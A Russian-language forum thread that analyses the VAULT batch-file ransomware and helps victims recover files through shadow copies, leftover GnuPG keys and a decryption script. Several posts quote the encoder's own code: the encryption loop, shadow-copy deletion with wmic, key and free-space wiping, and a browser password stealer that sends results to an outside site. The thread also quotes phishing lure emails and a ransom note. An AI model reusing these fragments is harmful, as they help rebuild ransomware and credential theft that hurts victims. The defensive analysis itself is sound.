VAULT: что делать?

safetysafety
отредактировано June 2020 Раздел: Шифровирусы шумной толпою
imageЕсли вам необходимо восстановить документы зашифрованные после атаки VAULT, выполните следующие действия:

1. проверьте наличие теневых копий на дисках. если есть чистые теневые копии, восстановить документы можно без расшифровки. Используйте для работы с теневыми копиями ShadowExplorer

если теневые копии отсутствуют, (возможно были отключены или удалены шифратором), восстановите (на будущее) через настройки защиты дисков резервирование пространства в 5-10% под теневые копии.

2. если теневые и архивные копии отсутствуют, вы можете попытаться самостоятельно выполнить расшифровку документов.
для этого необходимо найти файл secring.gpg. secring.gpg(sec key) здесь нужен не любой, не найденный по дороге домой из сетевого форума, а автоматически созданный шифратором на вашей машине (как правило в %TEMP% юзера) в момент запуска процесса шифрования. Заметим, что вероятность успешного поиска secring.gpg невелика, поскольку шифратор тщательно затирает данный ключ с помощью утилиты sdelete.exe: 
"%temp%\sdelete.exe" /accepteula -p 4 -q "%temp%\secring.gpg"
или путем перезаписи ключа мусорной информацией. 
echo 77406a1e885873e930cb056a91c09c60 25ca7a7cd21f132ab320494e> "%temp%\secring.qpq"
echo 9767d5483a3b7af1 6d0f24b86d997bc025ca7a7c7bff218e4077430c>> "%temp%\secring.qpq"
echo 9767d548 3a3b7af16d0f24b8 6d997bc025ca7a7c 7bff218e4077430c>> "%temp%\secring.qpq"
echo 59665d79acda3f3369aca9093c843d11 a3811a181107cc4cc68cd952>> "%temp%\secring.qpq"
echo 071faa5ef941ecc1 ca70214e1e7597484c2e533d97cf86b0e479bce7>> "%temp%\secring.qpq"
echo acda3f33 ca70214e 91c09c6030cb056a cb2f4cf2 7bff218e4077430c>> "%temp%\secring.qpq"
move /y "%temp%\secring.qpq" "%temp%\secring.gpg"

Повторный запуск шифратора с целью получения этого ключа не поможет. ключ будет создан уже с другим отпечатком и ID, и для расшифровки ваших документов не подойдет. пробуйте искать данный ключ среди удаленных файлов, но обязательно ненулевого размера. ~1Кб.

так же пробуем искать hex блоки
9501D804558F43D6010400BA49F79C06
9501D804558F3209010400BE8B3CB164
9501D80455A4EE32010400B53F95F674
или ASCII блоки "Cellar", которые содержатся на диске в файле sec key/secring.gpg с помощью, например, Winhex
---------
+ соберите в один архив все файлы из %TEMP% пользователя, созданные на дату и время шифрования документов. Это могут быть и такие файлы (с произвольным набором букв и цифр):
268244f0.8e651db9, c3803433.adc31ea7, d6ccb63f.88b5e541
возможно, в одном из таких файлов хранится экспортированный секретный ключ (secring.gpg) в незашифрованном виде.

что делает шифратор с исходными файлами: 
dir /B "%1:\"&& for /r "%1:\" %%i in (*.xls *.doc) do (
echo "%%TeMp%%\svchost.exe" -r Cellar --yes -q --no-verbose --trust-model always --encrypt-files "%%i"^& move /y "%%i.gpg" "%%i"^& rename "%%i" "%%~nxi.vault">> "%temp%\cryptlist.lst"
echo %%i>> "%temp%\conf.list"
)
после шифрования к примеру файла 1.doc рядом с ним создается зашифрованный файл 1.doc.gpg, затем зашифрованный 1.doc.gpg перемещается на место исходного_чистого с новым именем 1.doc, и только затем переименовывается в 1.doc.vault.
т.о. исходный файл не удаляется, а перезаписывается зашифрованным документом с целью невозможности его восстановления.
-------
Добавим, что злоумышленники после завершения шифрования оставляют на диске файлы VAULT.KEY и CONFIRMATION.KEY. Первый содержит экспортированный secring.gpg, но зашифрованный с помощью pub key злоумышленников, поэтому расшифровать его на нашей стороне невозможно. (VAULT.KEY рекомендуем сохранить на будущее, возможно, когда-нибудь злоумышленники опубликуют свои приватные ключи, и появится возможность извлечь ваш сессионный ключ и расшифровать данные). В CONFIRMATION.KEY содержится полный список зашифрованных файлов. Оба эти файла оставлены на диске в качестве жеста "доброй, но и злой воли" с целью "протянуть руку товарищеской, но платной помощи" пострадавшему юзеру.
--------
если sec key найден (живой и невредимый), вы можете установить GnuPG и GPGShell и проверить возможность расшифровки.

скачайте Simple installer for GnuPG 1.4 отсюда и установите текущую версию.


+
отсюда можно скачать GPGShell

В GPGShell удобно (из контекстного меню) выполнять различные действия над файлами и ключами.



+
После установки в каталоге так же можно найти подробный мануал (gpg.man) по консольным командам в GnuPG.
-----------

как избежать встречи с VAULT?
1. будьте предельно внимательны при работе с почтой.
если вложенный в сообщение или добавленный по ссылке архив содержит исполняемые файлы *.exe, *.com, *.pif, *.js, *.cmd, *.scr, *.bat, *.vbs, *.wsf, *.lnk, то такой документ никак не может быть офисным документом. Значит вас вводят в заблуждение, выдавая черное за белое.
2. настройте самостоятельно или попросите админа настроить политики ограниченного запуска исполняемых программ из вложенных архивов.
например: 
XP:%userprofile%\Local Settings\Temp\_tc\*.js
Win7:%userprofile%\Appdata\Local\Temp\_tc\*.js
3. Пробуйте с помощью HIPS запретить запись в файл %TEMP%\pubring.gpg. в любом случае, в данной модификации энкодера (если он использует GnuPG) после скачивания и запуска утилита gpg.exe (которая может быть переименована и упакована как угодно) вначале будет создавать ключевую пару pubring.gpg/secring.gpg, а затем уже - шифровать ваши данные с помощью созданных ключей.

4. Если предварительно положить (и защитить от изменения) известный вам ключ pubring.gpg, то в этом случае шифрование состоится, но известным ключом. Или не состоится.

(с), chklst.ru
---------
другие статьи:
бат-энкодер.
Шифровирусы шумной толпою
Рекомендации
детальный разобр кода ВАУЛТ на Хабре.
Bleepingcomputer.com
Мы ищем точки опоры не с целью перевернуть мир, но чтобы не позволить миру опрокинуть нас.
Тэги темы:
Share on Google+

Комментарии

  • safetysafety
    отредактировано October 2015 PM
    пример декодера для VAULT 
    @ECHO OFF
    attrib -s -h -r UNCRYPT.KEY
    if not exist UNCRYPT.KEY (echo UNCRYPT.KEY NOT EXIST - press any key&pause&goto eof)
    gpg.exe --import UNCRYPT.KEY

    FOR %%f IN (C D E ) DO call :decode %%f
    goto eof
    :decode

    dir /B "%1:\"&& for /r "%1:\" %%i in (*.gpg) do (
    gpg.exe --batch --no-verbose -q --decrypt-files "%%~di%%~pi%%~ni.gpg" & del /f /q "%%~di%%~pi%%~ni.gpg"
    )

    dir /B "%1:\"&& for /r "%1:\" %%i in (*.vault) do (
    RENAME "%%~fi" "%%~ni.gpg" & gpg.exe --batch --no-verbose -q --decrypt-files "%%~di%%~pi%%~ni.gpg" & del /f /q "%%~di%%~pi%%~ni.gpg"
    )
    :eof
    ECHO.
    ECHO FINISHED!
    Мы ищем точки опоры не с целью перевернуть мир, но чтобы не позволить миру опрокинуть нас.
    Share on Google+
  • korneykorney
    отредактировано July 2015 PM
    Здравствуйте.

    Прочитал Ваш материал

    Словили вирус от контрагента, открыли акт сверки. Итог - все переименовано VAULT (doc, xls, pdf, cdr)

    Опираясь на Вашу статью сделал на что хватило знаний.

    Нашел "CONFIRMATION.KEY"
    Нашел "VAULT.KEY"
    Нашел "a2b0796b.83469cdb" , похоже это (secring.gpg), содержимое файла "17b80909 " (переименовал "a2b0796b.83469cdb" в "UNCRYPT.KEY")

    А вот дальше для меня темный лес.

    Операционка XP
    GPGshell не установился (какая-то проблема в Patch)
    с GNUpg попробовал неудачно
    переименовал "a2b0796b.83469cdb" в "UNCRYPT.KEY"
    сделал "decod.bat", в который поместил Ваш пример и запустил.
    Программа запустилась, но пишет ошибки в пути. Результат нулевой
    Прошу помощи.
    Не специалист, далек от темы и мало что понимаю.

    Файлы не удалось прикрепить здесь, выслал на почту.

    С уважением
    Share on Google+
  • safetysafety
    отредактировано May 2015 PM
    korney,
    для начала надо все таки проверить и убедиться что файл, который вы считаете секретным ключом (secring.gpg) им и является. Поскольку secring.gpg в данном случае является во всех смыслах ключом к решению проблемы с расшифровкой документов *.vault.
    Нашел ваше сообщение в почте. с предположением о secring.gpg вы ошиблись, файл, найденный им не является. вот его содержимое. 17b80909.
    Содержимое sec key может быть таким (если ключ импортирован из secring.gpg): 
    -----BEGIN PGP PRIVATE KEY BLOCK-----
    Version: GnuPG v1 - GPGshell v3.78

    lQHYBFPy0uYBBADh/EyBpT0cckP+XP98IMxWio2n/kzM4+Ey9jLslRnJWFzOu1sq
    SMF+UTOpKPP9PtlxMW2nFtJy61n8LUml6wWOobrjHcXPFnJVh8Xofg9pI68KvOL7
    KBK047WckePqXt4NkEKk+i6k1HMokdT+53suI0RlntGW/WWSzEkweFdTNwARAQAB
    AAP/UY2+gm8CbdiixxICtWYUuAqKcpzoVGzMoZqN6CkqxCnaXFTq4oidI5vkW+DG
    pJbg2+OtocYvrn9W2xXw5Sq6tv/1sZ4DOzpIH+kjvWj1VtdyzjQh/efxwl7i+l6H
    IXj9L10CwRUfRxqM6PpKIdI1Xo5Zu6cqH9BQ5LP7fHchfKECAO+Kqh7SorWrEXYo
    Uscn9kIFSAF/9PX/gy9u5sefqJvXHvue8RwFr+aSFEXIJt+fs2IkFLZ2x3b2QUHA
    tCPMedECAPGDMZWnrwegp4R5OIiJWLNL8QFqmcLDjt7rVKC37EAaVfABDyYEXnR0
    ZmJ3My/yl2ii6IsIM5xKs1O9WzwBNocCAKSlzE+tymI8zrUjhxQv2MMswTIowCiO
    XkbndX88Evl04yq7MojbaOEuu7CPaBxv7ci8htH8QG3KiodtqOXdt0inlLQoY3J5
    cHRwYXkgKGNyeXB0cGF5KSA8cGF5Y3J5cHRAZ21haWwuY29tPoi4BBMBAgAiBQJT
    8tLmAhsvBgsJCAcDAgYVCAIJCgsEFgIDAQIeAQIXgAAKCRANiadIxmhTvGrABACV
    q7Vap/mrzRb8AWnnxEhxFyZWH7WAeg2YoTiZmG82WI3ux/uKLTjxicyQBzEIH73b
    Tf0uae/9TJD4TslUlp5NNm7p0enBKg5fP5ynSQojjet3OMR5p4EUyHh5Mfrb7enh
    4vyx1knIRChODZEe9JYN4CPTzy7cFO3H9PxWGTy2rQ==
    =Tkkh
    -----END PGP PRIVATE KEY BLOCK-----
    но может быть и несколько другим, в зависимости от формата ключа. Размер secring.gpg, содержащего один ключ порядка 1-2кбайт
    Мы ищем точки опоры не с целью перевернуть мир, но чтобы не позволить миру опрокинуть нас.
    Share on Google+
  • safetysafety
    отредактировано May 2015 PM
    VAULT стал добавлять скрипт дошифрования документов в автозапуск текущего пользователя на случай аварийной перезагрузки или выключения системы . 
    C:\Users\0D88~1\AppData\Local\Temp\06dca008.js
    Скрипт: Kарантин, Удалить, Удалить через BC Активен Ключ реестра HKEY_USERS, S-1-5-21-3033825225-2200833762-766671363-1146\Software\Microsoft\Windows\CurrentVersion\Run, ffe7c7a0
    --------
    если шифрование было завершено, в этом случае ключ удаляется из автозапуска.
    Мы ищем точки опоры не с целью перевернуть мир, но чтобы не позволить миру опрокинуть нас.
    Share on Google+
  • Rav4Rav4
    отредактировано November 2016 PM
    Может ли являться ключем часть одного .bat файла найденного в TEMP: 
    echo -----BEGIN PGP PUBLIC KEY BLOCK-----> "%temp%\d7207bf5.c082b387"
echo Version: GnuPG v1>> "%temp%\d7207bf5.c082b387"
echo.>> "%temp%\d7207bf5.c082b387"
echo mI0EVVjwywEEANQn02UZ0tBrXSGMzkfWiKMxe5/4c198Nrlk4gOw6uNFmXHTtQf6>> "%temp%\d7207bf5.c082b387"
echo KQk+cMQrmmnJ10u6kJSdGVK19dyeJkl0Hboz8AnzXS9fY7lXH/YaCi2qNFZQvorn>> "%temp%\d7207bf5.c082b387"
echo HFZtlLab5oGqIOsONqX0N5DpsAYGxMLLBdm4oBofW1KVduvXntvk9R3FABEBAAG0>> "%temp%\d7207bf5.c082b387"
echo ClZhdWx0Q3J5cHSIuAQTAQIAIgUCVVjwywIbLwYLCQgHAwIGFQgCCQoLBBYCAwEC>> "%temp%\d7207bf5.c082b387"
echo HgECF4AACgkQRlNzHQA7GMW7ZAQArvXRHEoE+7IfwG9viV3PzwxN/X2rPbPCDFLP>> "%temp%\d7207bf5.c082b387"
echo qoikWl31MOVEOMYaFWMay5vXogSA3SbqGwqx/PmMoVffP4oYifM5Tat3DKM3zxLk>> "%temp%\d7207bf5.c082b387"
echo 4APNcThQAvPA7JMal24E6T6XpoISBO4IfR2DiO2rECglfaKXpG40hPjUnfAzYIkl>> "%temp%\d7207bf5.c082b387"
echo /insCn8=>> "%temp%\d7207bf5.c082b387"
echo =ZpHA>> "%temp%\d7207bf5.c082b387"
echo -----END PGP PUBLIC KEY BLOCK----->> "%temp%\d7207bf5.c082b387"
    Я так понимаю это публик ключ для получения приват ключа из VAULT.key.
    Или это только часть ключа, а остальная часть ключа на сервере зловреда.
    Если надо прилажу сам батник, но каспер на него визжит
    Share on Google+
  • safetysafety
    отредактировано October 2017 PM
    Rav4,
    1. имейте ввиду, что в схеме VAULT (как и ранее в paycrypt/keybtc) используются две пары ключей. Первая пара (pub/sec (1)) создается на стороне пользователя в момент запуска шифратора. pub key(1) используется для шифрования документов юзера, sec key (1) необходим для расшифровки документов.

    Вторая пара ключей (pub/sec (2)) создается заранее, за пределами системы юзера (на стороне злоумышленников). pub key (2), который здесь воспроизводится текстовыми строками скрипта энкодера, в дальнейшем используется для шифрования вашего secring.gpg (т.е. sec (1)), и результат шифрования будет помещен в VAULT.key.

    (т.е. то, что вы показали - это pub(2) из пары, созданной на стороне злоумышленников, добавленный злоумышленниками в тело энкодера.
    он используется для шифрования sec(1) из вашей пары.)

    2. sec (2) в системе юзера никак не светится!

    3. воссоздать sec(2) (т.е. sec key злоумышленников) по известному ключу pub key (2) невозможно за разумное время.

    Поэтому. Расшифровка VAULT.key возможна только на стороне злоумышленников.

    или. Если. спустя некоторое время, злоумышленники опубликуют хотя бы часть своих мастер-ключей, сделав жест доброй воли. Как это делают некоторые из разработчиков шифраторов.
    Мы ищем точки опоры не с целью перевернуть мир, но чтобы не позволить миру опрокинуть нас.
    Share on Google+
  • safetysafety
    отредактировано July 2015 PM
    июньский вариант ВАУЛТ: 
    Здравствуйте!
    В соответствии с нашей информацией за Вашим предприятием до сих пор числиться недоплата (примерно 15 тыс р.).
    Прошу проверить нашу информацию и ответить по возможности оплаты.
    Скидываю акты и накладные по прошлогодней поставке (во вложении).

    ЗАГРУЗИТЬ ИНФОРМАЦИЮ

    С уважением,
    Бухгалтер ООО Альфа-Системс Наталья Воронова
    ----------
    схема распространения прежняя: через сообщения в электронную почту, со ссылкой на архив из сети. Архив содержит js в теле которого в закодированной форме (base64) содержатся модули, необходимые для шифрования.

    раскодировать js с целью анализа исполняемых файлов можно здесь
    http://foxtools.ru/Base64

    для шифрования по прежнему используется gpg.exe v 1.4.18 в упакованном виде (UPX) и переименованным в winlogon.exe 
    gpg (GnuPG) 1.4.18
    Copyright (C) 2014 Free Software Foundation, Inc.
    License GPLv3+: GNU GPL version 3 or later 
    This is free software: you are free to change and redistribute it.
    There is NO WARRANTY, to the extent permitted by law.

    Home: C:/Documents and Settings/safety/Application Data/gnupg
    Поддерживаются следующие алгоритмы:
    С открытым ключом: RSA, RSA-E, RSA-S, ELG-E, DSA
    Симметричные шифры: IDEA, 3DES, CAST5, BLOWFISH, AES, AES192, AES256,
                        TWOFISH, CAMELLIA128, CAMELLIA192, CAMELLIA256
    Хэш-функции: MD5, SHA1, RIPEMD160, SHA256, SHA384, SHA512, SHA224
    Алгоритмы сжатия: Без сжатия, ZIP, ZLIB, BZIP2
    ключевая пара, которая создается на стороне пользователя содержит имя Cellar 
    echo Key-Type: RSA> "%temp%\d623756e.1e103e00"
    echo 4PZATNvx7Pv3h2NKWbnS9zBs9PHFcmjDdS4WcTg9jhqqhAecn6hunKm3aHPZrUp6 >nul
    echo Key-Length: 1024>> "%temp%\d623756e.1e103e00"
    echo Name-Real: Cellar>> "%temp%\d623756e.1e103e00"
    ключевая пара, используемая для шифрования ключей пользователя содержит имя VaultCrypt
    схема шифрования файлов прежняя: 
    dir /B "%1:\"&& for /r "%1:\" %%i in (*.psd *.dwg *.cdr) do (
    echo "%%TeMp%%\winlogon.exe" -r Cellar --yes -q --no-verbose --trust-model always --encrypt-files "%%i"^& move /y "%%i.gpg" "%%i"^& RENAME "%%i" "%%~nxi.vault">> "%temp%\a43b4e32.09831a7f"
    echo %%i>> "%temp%\bb312c4a.da2279a0"
    шифрование ключей пользователя выполняется с помощью VaultCrypt: 
    if not exist "%temp%\VAULT.KEY" (
    "%temp%\winlogon.exe" -r VaultCrypt --yes -q --no-verbose --trust-model always --encrypt-files "%temp%\8eacbbf1.e2fe1f1a"
    RENAME "%temp%\8eacbbf1.e2fe1f1a.gpg" VAULT.KEY
    )
    if not exist "%temp%\CONFIRMATION.KEY" (
    "%temp%\winlogon.exe" -r VaultCrypt --yes -q --no-verbose --trust-model always --encrypt-files "%temp%\7894c7d5.0b952c1f"
    RENAME "%temp%\7894c7d5.0b952c1f.gpg" CONFIRMATION.KEY
    )
    заметим, что свои приватные ключи мошенники стали менять гораздо чаще.

    удаление теневых копий на дисках выполняется с помощью системной утилиты wmic.exe: 
    echo objShell.ShellExecute "wmic.exe", "shadowcopy delete /nointeractive", "", "runas", 0 >> "%temp%\64da1372.vbs"
    затирание ключей шифрования происходит посредством создания мусорного ключа с перемещением его в оригинальный ключ: 
    echo 4946f1b49f393e59b1d5019835b2dfac 5c309608f24fe8ad083301a4> "%temp%\secring.qpq"
    echo VgAYLnWjxRk8vVuqXRjmQG5Zpf75VG6JjFCJ9YhPUwR2BhjYnHyLyEcDkPqf9GaD >nul
    echo jKypPWhc2XQMSBfnwd55kkp9dbkDA3E7aaLxPr7fMHgNTu68jgbAG4gmgJP4K3LD >nul
    echo 0b952c1f5295443d 13c486b3b43238045c309608bda77785d8da5076>> "%temp%\secring.qpq"
    echo 0b952c1f 5295443d13c486b3 b43238045c309608 bda77785d8da5076>> "%temp%\secring.qpq"
    move /y "%temp%\secring.qpq" "%temp%\secring.gpg"
    из тела энкодера запускается утилита для поиска паролей в браузерах.
    найденные пароли будут отправлены на сайт злоумышленников. 
    if exist 065ed39e.exe (
    "%temp%\065ed39e.exe" -f "%temp%\6eb7832c.a238703f"
    wscript.exe //B //Nologo //T:120 "%temp%\3c2901e8.vbs" "%temp%\6eb7832c.a238703f" http://attached-email.com/v.php pf
    del /f /q 065ed39e.exe 
    )
    для затирания удаленных файлов с целью предотвращения восстановления удаленной информации используется системная утилита cipher.exe 
    if exist "%systemroot%\system32\cipher.exe" (
    FOR %%s IN (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z) DO call :c53699f3 %%s
    echo VLvqFsx2vrPgrLhuZWgT3XqJVRLw6kVeM2k6fgAhfs9bQ6MyArMq8k4xyZxJ >nul
    goto 1acf5f5c
    :c53699f3
    cipher /w:%1:
    Мы ищем точки опоры не с целью перевернуть мир, но чтобы не позволить миру опрокинуть нас.
    Share on Google+
  • GepeekGepeek
    PM
    Здравствуйте, тоже словили вирус:( вот нашел какие то файлы, подскажите это не ключи? Сохранил на яндекс диск https://yadi.sk/d/BAwVBS59hTJtM
    Share on Google+
  • safetysafety
    отредактировано June 2015 PM
    Gepeek,
    здесь только pub key. его недостаточно для расшифровки файлов.
    ------------- 
    gpg: ключ 371B3EDB: импортирован открытый ключ "Cellar"
    gpg: Всего обработано: 1
    gpg:                 импортировано: 1

    - Public keyring updated. -
    Мы ищем точки опоры не с целью перевернуть мир, но чтобы не позволить миру опрокинуть нас.
    Share on Google+
  • safetysafety
    отредактировано September 2015 PM
    Вулкан по имени VAULT вновь проснулся.
    после июльских каникул, сегодня появились новые рассылки, по крайней мере две.
    схема рассылки изменилась. опять в почте добавлен небольшой архив *.zip в котором содержится еще один js (в теле исходного js содержится в base64 кодировке еще один js, скорее всего updater, которому передается управление). после запуска update.js (может быть и другое имя) выкачивает из сети с адреса *oruzhkov.net* все необходимые для шифрования модули и файлы, и запускает через *.bat инициализацию процесса шифрования.
    модуль используемый для шифрования: gpg.exe. (временно отказались от переименования в svchost.exe, winlogon.exe и т.п.)

    из особенностей нового варианта: массовое добавление мусорных инструкций в тело энкодера: 
    echo 27359ab1f8323107f47cc4ffdbf919fa6818ea19b8fdf16991c897a7ec88­624f
    echo c4113c94192ee95f565bb4f1d3b7cd2959d3ce34148c30ca34d7c7a66638­ae5c0
    echo W5espeWrezu5A6hUhuBRU5evemupH2cE >nul
    echo V33rhYGgfyisahdgJFKASDadbahsgvjdWaga >nul
    echo speFrez4chE3asw4RebrU32haGedaDAD >nul
    echo 9kYTla1Z2v4RqBIe7bMIphoN3yZ6zJ9z21bn1NK3CN4TBuBPkb
    echo VwmmrE52cmWxWNq5CiI2cHZHMRSewEE0uq254wS5VjlQNunrBY
    для очистки энкодера от мусорных команд используем небольшую программку: 
    REM clean_vlt_bat
    findstr /v ">nul 27359ab1f8323107f47cc4ffdbf919fa6818ea19b8fdf16991c897a7ec88624f c4113c94192ee95f565bb4f1d3b7cd2959d3ce34148c30ca34d7c7a66638ae5c0 4aa66e69dd2ed5d89ce4088643f46baac4113c94192ee95f565bb4f1d3b7cd29 9kYTla1Z2v4RqBIe7bMIphoN3yZ6zJ9z21bn1NK3CN4TBuBPkb VwmmrE52cmWxWNq5CiI2cHZHMRSewEE0uq254wS5VjlQNunrBY CNKM5uZisBFr8E8ZvA92aYEyCErjpEnbT3MtueqFD3AJPcEcrb RobfE3bEJP9vMkgaekFEjsqvlEaHscq14JcFSZlrQyjrKNyTge" "install.vbat"> "clean_install.vbat"
    тело письма: 
    Мы составили акт сверки взаиморасчетов по итогам прошлого месяца (во вложении).
    Мы установили, что по нашему последнему счету (от 12.07) Вы не полностью перевели средства.
    Если будут расхождения - пишите. Если все верно - просто перешлите нам скан завизированного Вашей стороной экземпляра.

    Буду благодарна, если вышлите в ближайшие сроки.
    Благодарю.

    __
    С ув. к вам,
    Катя Васильева,
    зам главбуха Компании Торг-Строй
    и 
    Акт сверки(в приложении к пиcьмy).
    Убедительная просьба до завтрашнего обеда выслать отсканированную копию подписанного с Вашей стороны экземпляра или же ваши замечания.
    Хотели бы подчеркнуть, что за Вашей фирмой висит непогашенный платеж за июнь.

    -
    С ув. к вам,
    Воронова Елена
    зам. главного бухгалтера Компании "Торговая площадь"
    Мы ищем точки опоры не с целью перевернуть мир, но чтобы не позволить миру опрокинуть нас.
    Share on Google+
  • safetysafety
    PM
    + 
    Акт сверки взаиморасчетов(в приложении).
    Убедительная просьба до конца завтрашнего дня скинуть скан-копию завизированного документа или ваши комментарии.
    Хотели бы подчеркнуть, что за вами висит непогашенный платеж за прошлый месяц. 

    ---
    С ув. к вам,
    Елена Александровна Воронова
    зам. главного бухгалтера Компании ТОРГОВАЯ ПЛОЩАДЬ
    Мы ищем точки опоры не с целью перевернуть мир, но чтобы не позволить миру опрокинуть нас.
    Share on Google+
  • safetysafety
    отредактировано January 2018 PM
    проанализировал шестнадцатиричные блоки для файлов secring.gpg (Cellar, 673байта), создаваемых при запуске VAULT:

    видим, определенную закономерность. начальные блоки sec key одинаковы, и начинаются с hex блока 95 01

    несколько примеров hex блоков:
    begin:9501D80455CB248F010400DC7E045A73DBF1965B0BAB21C9AF4CE0FEA92C8731D850DE88C1BF238740FF0EFBB5CA03F0
    ...
    end:0EE3C2754A64BE61B60B0B8235E1AB39BC4B5CCD070C6998FDEEEDA236128FB9E009413DCF0CAA92F94F95F515B0020000
    -----------
    9501D80455CAC4F4010400A13ADBF4A462FA5ACD218723FE3A49A7E611D7C5BAF2AF7BA8FFFC81D3E9775350B3D37B6B
    ...
    FC8682BF95061308F38ABFEEF8352C0A55DEAD9ED63B7F54BB1FB3C20B1CB9AC864DB0C0D89E785C40DE4153E2B0020000
    -----------
    9501D80455CAB3C8010400AE29DE645643EAE1DCEBAEB91BBA7379B2F11567EAA73156F3CF18ACE2E79E32692A3AABF1
    ...
    178B1E58688BF0A0B791DF9DEF33D7BA6A3E0D50C72AF0E0882CAE4054C96361790195EE48B024B7E8F95418E4B0020000
    ------------
    9501D80455A4EE32010400B53F95F674A61AC716A598F4EDDFCFE219554F49C9B58A108CDAC4ACFBCB2EDD27730A3004
    ...
    8EDCA3D6066F6B8823893D9BAB213B4F213CA33CBFDB6B0F2C1A30A7EFD54631E154100A12F21F197A40B8CF2EB0020000
    ------------
    9501D804558F43D6010400BA49F79C06B1103C6A3D054149C5DD84DB4BC4136E2F637ED3A25D91177744B7B0A25B6B75
    ...
    3F729162A3CAC72624AA0C04A50FC596731CB8A5966052F2595FE90449EF1CF1E480FA1821183830F5A4A8B132B0020000
    -------------------
    +
    файл secring.gpg помимо указанных hex блоков содержит имя ключа в ASCII кодировке.






    ключи pubring.gpg имеют другую начальную hex сигнатуру.




    Мы ищем точки опоры не с целью перевернуть мир, но чтобы не позволить миру опрокинуть нас.
    Share on Google+
  • safetysafety
    отредактировано August 2015 PM
    + new VAULT от 2015_08_17
    блокируем в блоклистах:
    *meetfeli.net* 
    Приветствуем Вас.
    Пересылаю акты передачи услуг и счета-фактуры по заключенному между нами Контракту - во вложении.
    Если замечаний по качеству у Вас нет, то мы ожидаем перечисления оплаты.
    Хотели бы напомнить, что согласно условиям договора, перечисление средств осуществляется в течении 3 рабочих дней с дня выставления документов.
    Жду ответа в кратчайшие сроки. Заранее благодарю!

    __
    С Уважением к Вам,
    отдел бухгалтерии ЧП СтройИнвест
    + 
    От кого: Уфаэнергоучет ООО <[email protected]>
    Кому: *****
    Дата: Понедельник, 17 августа 2015, 3:03 +03:00
    Тема: Документация по контракту №5-6

    Уважаемые партнеры!
    Отправляю акты приема-передачи и счета по нашему Контракту - прилагаются.
    Если замечаний по содержанию документов у Вас нет, то мы ожидаем перечисления средств.
    Хотели бы напомнить, что согласно условиям контракта, расчет производится в течении трех банковских дней с момента выставления счетов.
    Жду ответа в ближайшее время. Заранее благодарю!

    ---
    с ув. к Вам,
    гл. бухгалтер общества с ограниченной ответсвенностью СтройИнвест
    Мы ищем точки опоры не с целью перевернуть мир, но чтобы не позволить миру опрокинуть нас.
    Share on Google+
  • safetysafety
    отредактировано October 2017 PM
    dec, 2015

    возможно, скоро состоится возвращение ВАУЛТ/бат-энкодера.

    ransom-note.jpg
    A new ransomware called the XRTN Ransomware is in the wild that encrypts your data with RSA-1024 encryption using the open source Gnu Privacy Guard (GnuPG) encryption software. This ransomware is part of the same family as the VaultCrypt ransomware that we reported on in March. When infected, the user will be shown a HTA document when Windows starts that instructs the victim to contact the email address [email protected] for help. It is currently unknown how much the author is charging for the ransom. At this time there is no way of recovering the decrypt key.

    master-public-encryption-key.jpg
    на рисунке мы видим как формируется master pub key для .xrtn

    http://www.bleepingcomputer.com/news/security/xrtn-ransomware-uses-batch-files-to-encrypt-your-data/
    Мы ищем точки опоры не с целью перевернуть мир, но чтобы не позволить миру опрокинуть нас.
    Share on Google+
  • safetysafety
    отредактировано October 2017 PM
    nov, 2016

    Как оказалось, это было не возвращение VAULT/бат-энкодера, а его "всплытие" в декабре 2015 года Германии.
    +еще дважды бат-энкодер был замечен в Германии как вариант *.trun
    (февраль-март 2016)
    ATTENTION!

    All important files and information on this comuter (documents, databases, etc.) will be decrypted using a RSA cryptographic algorithm

    Without special software decoding a single file with the help of the most powerful computers will take about a 20 years.
    _____________________________
    contact an expert on e-mail:[email protected] .
    PGP-Schlüssel des trun-Trojaners

    Den geheimen Schlüssel eines Pseudo-Benutzers Cellar, der erforderlich ist, um die Dateien wieder zu entschlüsseln, exportiert der Trojaner mit dem Kommando

    gpg.exe -r Cellar --export-secret-keys

    Anschließend verschlüsselt er diesen mit dem Befehl

    gpg.exe -r kkkkk ... -o "%temp%\trun.KEY"
    https://www.heise.de/security/meldung/Erpressungs-Trojaner-verschluesselt-mit-PGP-3116677.html

    и как вариант *.xort
    Hallo,
    seit vorgestern (16.3.16) hat ein Virus alle meine Office und Bild Dateien verschlüsselt und mit der Endung .xort versehen (beisoiel.docx > beispiel.docx.xort).
    Nach dem Start erscheint auf dem Desktop ein schwarzer Kasten mit roter Schrift:

    ATTENTION
    All Important files and information on this computer (documrnts, databases etc,) will be decrypted using a RSA cryptographic algorithm
    Without special software decoding a single file with the help of the most powerful computers will take about a 20 years.
    contakt an expert on email: [email protected]
    http://www.trojaner-board.de/177019-windows-10-rechner-xort-virus-befallen.html
    Original-Nachricht
    Betreff: Re:support
    Datum: 2016-05-12T13:38:58+0200
    Von: "xort xort" <[email protected]>
    An: "[email protected]" <[email protected]>

    Hi
    1) Send us please one file "xort.key" (it is located on your computer)
    2) Pay 1.3 bitcoin ~ 500 usd address "17byDyH6TbMAJDkEKKdghQZBY3fcuphAyj" (bitcoin can buy bitcoin.de or localbitcoins.com or etc..)
    3) After payment we will send to your e-mail decryptor
    интересно, что в варианте xort используется старый (от 15.04.2015г) приватный ключ:kkkkk <[email protected]>
    "%temp%\gpg.exe" -r kkkkk --yes -q --no-verbose --trust-model always -o "%temp%\xort.KEY" -e "%temp%\6ynttjgc.turwc37s"
echo jYsqkAyiFvIV9DghQjYvDKjBBQRqBM1eK1xCGq84s5K1OxRF4MUmnssllsPN >nul
"%temp%\gpg.exe" -r kkkkk --yes -q --no-verbose --trust-model always -o "%temp%\CONFIRMATION.KEY" -e "%temp%\d6m6gmge.4ih4xipr"
echo CD57nc5Idg6UwrESooFVwQ7RfPcRYcf2aMR6lfYAGfUvf0alNLe >nul
    f5sch9rglfab.jpg

    здесь xort.key - это файл, в который экспортируется secring.gpg,
    gpg: зашифровано ключом RSA с ID 5F99B17C507B6FFD
    gpg: сбой расшифровки: Нет закрытого ключа

    File: X:\viruses\shifr\encoder\bat.encoder.xort\1\17\xort.KEY
    Time: 04.11.2016 23:56:10 (04.11.2016 16:56:10 UTC)

    видим, что информация о secring.gpg зашифрована подключом с ID 507B6FFD

    cat9zi4l65t8.jpg

    ниже строки формирования master pub key взяты из bat энкодера для варианта .xort 
    echo -----BEGIN PGP PUBLIC KEY BLOCK-----> "%temp%\wllqu5jo.8w5ut4oo"
echo Version: GnuPG v1>> "%temp%\wllqu5jo.8w5ut4oo"
echo.>> "%temp%\wllqu5jo.8w5ut4oo"
